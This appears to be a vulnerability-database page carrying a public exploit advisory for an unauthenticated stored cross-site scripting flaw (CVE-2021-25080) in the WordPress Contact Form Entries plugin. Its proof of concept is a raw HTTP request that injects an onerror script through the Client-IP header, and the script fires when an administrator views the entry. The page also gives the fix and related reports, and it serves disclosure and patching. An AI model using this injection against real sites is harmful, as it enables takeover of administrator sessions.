| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| WordPress CRM Form Entries 1.1.6 - Cross Site Scripting Vulnerability | 3 Jan 202200:00 | – | zdt | |
| CVE-2021-25080 | 24 Jan 202212:17 | – | circl | |
| WordPress plugin 跨站脚本漏洞 | 3 Jan 202200:00 | – | cnnvd | |
| WordPress CRM Form Entries Plugin Cross-Site Scripting Vulnerability | 6 Jan 202200:00 | – | cnvd | |
| Cross-Site Scripting Scanning Attempt (CVE-2015-4661; CVE-2019-16385; CVE-2019-9167; CVE-2020-10946; CVE-2020-12261; CVE-2020-13228; CVE-2020-13627; CVE-2020-13628; CVE-2020-14953; CVE-2021-21801; CVE-2021-25080; CVE-2022-25305; CVE-2022-28102) | 22 Mar 201600:00 | – | checkpoint_advisories | |
| CVE-2021-25080 | 24 Jan 202208:01 | – | cve | |
| CVE-2021-25080 Contact Form Entries < 1.1.7 - Unauthenticated Stored Cross-Site Scripting | 24 Jan 202208:01 | – | cvelist | |
| CVE-2021-25080 | 24 Jan 202208:15 | – | nvd | |
| CVE-2021-25080 | 24 Jan 202208:15 | – | osv | |
| WordPress CRM Form Entries Cross Site Scripting | 3 Jan 202200:00 | – | packetstorm |
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: gx1 <gaetano.perrone[at]secsi.io>
# Vulnerability Discovery: Gaetano Perrone
# Vendor Homepage: https://www.crmperks.com/
# Software Link: https://wordpress.org/plugins/contact-form-entries/
# Version: < 1.1.7
# Tested on: any
# References:
* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac
* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/
# Description:
Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting
# Technical Details and Exploitation:
CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field.
When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user:
===============================================================================================================
public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388
==============================================================================================================
The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database.
# Proof Of Concept:
Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header
===============================================================================================================
POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1
Host: dsp.com:11080
Content-Length: 1411
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ...
Client-IP: <img src=a onerror=alert(1)>
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
Content-Disposition: form-data; name="_wpcf7"
10
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_version"
5.3.1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_locale"
en_US
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_unit_tag"
wpcf7-f10-p13-o1
------WebKitFormBoundaryCuNGXLnhRsdglEAx
Content-Disposition: form-data; name="_wpcf7_container_post"
...
===============================================================================================================
The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database.
When the administrator clicks on the entry element in the plugin, the XSS is triggered.
# Solution:
Upgrade Contact Form Entries to version 1.1.7Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation